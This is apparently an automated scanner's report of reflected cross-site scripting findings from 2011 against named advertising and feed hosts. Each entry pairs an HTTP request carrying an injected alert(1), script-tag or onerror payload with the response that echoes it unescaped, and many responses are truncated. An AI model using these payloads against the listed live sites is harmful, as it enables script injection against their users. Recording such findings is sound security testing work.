GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... A3;text-decoration:none;} #content .feed_item_podcast{margin #content .feed_item_description #footer{display:none </style> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13662 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... rseInt(str); if(isNaN(num)){ return 0; } else if(!num) { return 0; } return num; } function init() { var rssMikleType = ''; var anchorTarget = '_blank'; var itemPodcast = 'iconccc5a';alert(1)/ var containerObj = document.getElementById( var headerObj = document.getElementById( var contentObj = document.getElementById(' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13834 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... #content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;} #content .feed_item_title{margin #content .feed_item_title a:link{color:#2F50A31f355 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13858 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... n strToInt(str) { num = parseInt(str); if(isNaN(num)){ return 0; } else if(!num) { return 0; } return num; } function init() { var rssMikleType = ''; var anchorTarget = '_blank9092f';alert(1)/ var itemPodcast = 'icon'; var containerObj = document.getElementById( var headerObj = document.getElementById( var contentObj ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13978 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <a href="http://asianew ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... ner{overflow:hidden #header{margin:0px #header .feed_title{margin:0 #header .feed_title a:link{color:#FFFFFF;text #hea ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:29 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... padding:0;width:325px #header{margin:0px #header .feed_title{margin:0 #header .feed_title a:link{color:#FFFFFF;text #header .feed_title a:visited{col ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... 0;} #container{overflow #header{margin:0px #header .feed_title{margin:0 #header .feed_title a:link{color:#FFFFFFc3aa7 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://feed.mikle.com |
Path: | /feeds/rssmikle.cgi |
GET /feeds/rssmikle.cgi Host: feed.mikle.com Proxy-Connection: keep-alive Referer: http://www.nationmul User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:28:17 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13662 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... '; } return tag; } function strToInt(str) { num = parseInt(str); if(isNaN(num)){ return 0; } else if(!num) { return 0; } return num; } function init() { var rssMikleType = '88a7c';alert(1)/ var anchorTarget = '_blank'; var itemPodcast = 'icon'; var containerObj = document.getElementById( var headerObj = document.getElementById( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ab |
GET /ab?enc=AAAAAAAAEEApXI Host: ib.adnxs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChIIrIsBEAoYASAB |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=9223372036854775807 Content-Type: text/javascript Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]# Date: Sun, 04 Sep 2011 03:31:07 GMT Content-Length: 809 document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js Host: imp.fetchback.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:29:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315106952 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 03:29:12 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 845 document.write("<"+ ...[SNIP]... 52Fclick%253Fcd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js Host: imp.fetchback.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:29:29 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315106969 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 03:29:29 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 848 document.write("<"+ ...[SNIP]... 4sIAAAAAAAAABXLuQ3DM ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imp.fetchback.com |
Path: | /serve/fb/adtag.js |
GET /serve/fb/adtag.js Host: imp.fetchback.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 03:29:15 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315106955 Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sun, 04 Sep 2011 03:29:15 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 843 document.write("<"+ ...[SNIP]... H4sIAAAAAAAAABXLuQ3D ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://mc8tdi0ripmbp |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=c391a%3balert(1)/ Host: mc8tdi0ripmbpds25ebo Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 502 Bad Gateway P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Sun, 04 Sep 2011 02:45:26 GMT Expires: Sun, 04 Sep 2011 02:45:26 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 71 Server: GSE Unable to retrieve spec for c391a;alert(1)/ |
Severity: | High |
Confidence: | Certain |
Host: | http://mc8tdi0ripmbp |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: mc8tdi0ripmbpds25ebo Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Sun, 04 Sep 2011 02:45:29 GMT Expires: Sun, 04 Sep 2011 02:45:29 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 128 Server: GSE Unable to retrieve spec for http://www.google.com alert(1)//22ed514ee17. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /action/track/type/0/pid |
GET /actionc0834<script>alert(1)< Host: msite.martiniadnetwork Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:16:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 04:16:01 GMT Vary: Accept-Encoding Content-Length: 706 Connection: close Content-Type: text/html <pre>exception 'CHttpException' with message 'Unable to resolve the request "actionc0834<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /action/track/type/0/pid |
GET /action/trackb0835<img%20src%3da Host: msite.martiniadnetwork Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:16:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 04:16:02 GMT Vary: Accept-Encoding Content-Length: 682 Connection: close Content-Type: text/html <pre>exception 'CHttpException' with message 'The system is unable to find the requested action "trackb0835<img src=a onerror=alert(1) Stack trace: #0 /home/library/framework ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /action/track/type/0/pid |
GET /actiond4161<script>alert(1)< Host: msite.martiniadnetwork Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:16:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 04:16:01 GMT Vary: Accept-Encoding Content-Length: 761 Connection: close Content-Type: text/html <pre>exception 'CHttpException' with message 'Unable to resolve the request "actiond4161<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /action/track/type/0/pid |
GET /action/track73908<img%20src%3da Host: msite.martiniadnetwork Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 04:16:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 04:16:02 GMT Vary: Accept-Encoding Content-Length: 682 Connection: close Content-Type: text/html <pre>exception 'CHttpException' with message 'The system is unable to find the requested action "track73908<img src=a onerror=alert(1) Stack trace: #0 /home/library/framework ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /index/ |
GET /indexa3c32<script>alert(1)< Host: msite.martiniadnetwork Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:41:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 02:41:25 GMT Vary: Accept-Encoding Content-Length: 465 Content-Type: text/html <pre>exception 'CHttpException' with message 'Unable to resolve the request "indexa3c32<script>alert(1)< Stack trace: #0 /home/library/framework ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /index/ |
GET /index/?pid=10000009868024f698'%3balert(1)/ Host: msite.martiniadnetwork Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:35:27 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Set-Cookie: MMNBASEID=2105131510 Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:35:28 GMT; path=/; domain=.martiniadnetwork Set-Cookie: MMNBASEVAL=n4TdBlRhN Set-Cookie: MMNATTR=ujBzvI%2Fu3o Set-Cookie: MMNSESSID=26de56d01e Set-Cookie: MMNSESSIDC=22; path=/; domain=.martiniadnetwork Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 02:35:27 GMT Vary: Accept-Encoding Content-Length: 1347 Content-Type: text/html var OAS_taxonomy = 'muid=21051315103139 var OAS_pubclick = 'http://msite.martin OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL; var OAS_ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://msite.martini |
Path: | /index/ |
GET /index/?pid=1000000986802 Host: msite.martiniadnetwork Proxy-Connection: keep-alive Referer: http://www.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 02:37:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Set-Cookie: MMNBASEID=2105131510 Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork Set-Cookie: MMNBASEVAL=4oFB Set-Cookie: MMNATTR=HXtQ0pfNkJ1c Set-Cookie: MMNSESSID=26de56d01e Set-Cookie: MMNSESSIDC=56; path=/; domain=.martiniadnetwork Cache-Control: max-age=15552000 Expires: Fri, 02 Mar 2012 02:37:10 GMT Vary: Accept-Encoding Content-Length: 1347 Content-Type: text/html var OAS_taxonomy = 'muid=21051315103139 var OAS_pubclick = 'http://msite.martin OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL; var OAS_searchterms = ''; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai392cc"-alert(1)- Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai392cc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai/daa.php7afbb"-alert(1)- Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php7afbb"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai119b2"-alert(1)- Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai119b2"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai/daa.php74451"-alert(1)- Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4E5FAC086E651A4 |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:12:24 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:12:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28277 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... lamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/nai/daa.php74451"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai3a3fb"-alert(1)- Host: nai.adserverec.adtechus Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
